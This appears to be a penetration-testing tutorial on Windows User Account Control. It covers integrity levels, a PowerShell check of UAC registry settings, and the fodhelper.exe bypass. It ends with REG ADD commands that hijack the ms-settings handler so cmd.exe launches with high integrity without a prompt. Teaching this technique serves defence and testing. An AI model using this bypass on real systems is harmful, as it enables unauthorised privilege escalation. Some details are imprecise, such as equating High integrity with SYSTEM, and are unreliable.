User Account Control (UAC) is an access control system that forces applications and tasks to run in the context of a non-administrative account until an administrator authorizes elevated access.
UAC was first introduced in Windows Vista and attracted complaints from users due to the frequency and annoyance of the popups, which led Microsoft to introduce some relaxations.
Mandatory Levels
Exists three types of Mandatory Level:
whoami /all
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Low Mandatory Level Unknown SID type S-1-16-4096 Mandatory group, Enabled by default, Enabled group
- Low Mandatory Level: Services like IE has no permissions, it can not write on any directory, but IE for example need to write cache on a directory. So with Low Mandatory Level we will only able to write data on the following path.
C:\Users\Victim\AppData\LocalLow - Medium Mandatory Level: Permissions as a normal user.
- High Mandatory Level: Permissions as NT AUTHORITY/SYSTEM.
UAC Bypass
Some of the own trusted signed applications are able to “auto-elevate” without consent in certain conditions.
The default configuration for UAC is Prompt for consent for non-Windows binaries, but can also have different settings such as Prompt for credentials, Prompt for consent and Elevate without prompting.
We can check UAC configuration with powershell.
$path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$filter="ConsentPromptBehaviorAdmin|ConsentPromptBehaviorUser|EnableInstallerDetection|EnableLUA|EnableVirtualization|PromptOnSecureDesktop|ValidateAdminCodeSignatures|FilterAdministratorToken"
(Get-ItemProperty $path).psobject.properties | where {$_.name -match $filter} | select name,value
Name Value
---- -----
ConsentPromptBehaviorAdmin 5
ConsentPromptBehaviorUser 3
EnableInstallerDetection 1
EnableLUA 1
EnableVirtualization 1
PromptOnSecureDesktop 1
ValidateAdminCodeSignatures 0
We are interested in ConsentPromptBehaviorAdmin parameter.
| Value | Meaning |
|---|---|
| 0 | Elevate without prompting |
| 1 | Prompt for credentials (Secure Desktop) |
| 2 | Prompt for consent (Secure Desktop) |
| 3 | Prompt for credentials |
| 4 | Prompt for consent |
| 5 (Default) | Prompt for consent non-windows binaries |
A UAC bypass is a technique by which an application can go from Medium Integrity to High Integrity without prompting for consent.
fodhelper.exe
fodhelper.exe is a Microsoft support application responsible for managing language changes in the operating system. This binary runs as high integrity on Windows 10.
With sigcheck.exe from SysInternals is posible to inspect the application manifest.
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
Note: Search for
requestedExecutionLevelasrequireAdministratorandautoElevateintrue.
First we need to add some registries with REG:
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f